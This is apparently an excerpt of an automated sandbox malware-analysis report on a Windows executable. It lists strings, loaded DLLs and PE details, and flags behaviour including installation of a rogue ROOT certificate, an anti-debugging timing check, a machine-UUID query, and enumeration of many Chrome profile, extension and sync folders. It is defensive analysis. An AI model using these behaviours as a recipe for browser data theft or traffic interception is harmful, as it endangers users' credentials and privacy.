Source: file.exeString found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
Source: file.exeString found in binary or memory: ) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
Source: file.exeString found in binary or memory: ) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
Source: file.exeString found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:
Source: file.exeString found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:
Source: file.exeString found in binary or memory: key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime:
Source: file.exeString found in binary or memory: key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime:
Source: file.exeString found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser are
Source: file.exeString found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser are
Source: file.exeString found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:
Source: file.exeString found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:
Source: file.exeString found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable t
Source: file.exeString found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable t
Source: file.exeString found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
Source: file.exeString found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
Source: file.exeString found in binary or memory: superfluous leading zeros in lengthP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitychacha20: output smaller than inputtransform: short destination bufferJSON value is not a structure (%#v)9d3f624caca482e8209131a76fc6dc09032c9d2d98b5769dcc48087ef7011677c5340e5d970f361a447a05fb5c2d752f0690854026fcbytes.Reader.Seek: negative positioncrypto/cipher: input not full blocksjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodslfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: file.exeString found in binary or memory: superfluous leading zeros in lengthP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitychacha20: output smaller than inputtransform: short destination bufferJSON value is not a structure (%#v)9d3f624caca482e8209131a76fc6dc09032c9d2d98b5769dcc48087ef7011677c5340e5d970f361a447a05fb5c2d752f0690854026fcbytes.Reader.Seek: negative positioncrypto/cipher: input not full blocksjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodslfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: file.exeString found in binary or memory: /home/via/go/pkg/mod/golang.org/toolchain@v0.0.1-go1.22.6.linux-amd64/src/net/addrselect.go
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exeStatic file information: File size 17171948 > 1048576
Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x45dc00
Source: file.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x832000
Source: file.exeStatic PE information: Raw size of /65 is bigger than: 0x100000 < 0x119400
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exeStatic PE information: section name: .xdata
Source: file.exeStatic PE information: section name: /4
Source: file.exeStatic PE information: section name: /19
Source: file.exeStatic PE information: section name: /32
Source: file.exeStatic PE information: section name: /46
Source: file.exeStatic PE information: section name: /65
Source: file.exeStatic PE information: section name: /78
Source: file.exeStatic PE information: section name: /90
Source: file.exeStatic PE information: section name: .symtab

Persistence and Installation Behavior

barindex
Installs new ROOT certificates
Source: C:\Users\user\Desktop\file.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0070C900 rdtscp2_2_0070C900
Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006D5080 GetProcessAffinityMask,GetSystemInfo,2_2_006D5080
Source: file.exe, 00000002.00000002.1503238297.000001D41C824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging

barindex
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0070C900 Start: 0070C909 End: 0070C91F2_2_0070C900
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0070C900 rdtscp2_2_0070C900
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationGuidePredictionModels VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationHints VolumeInformationJump to behavior
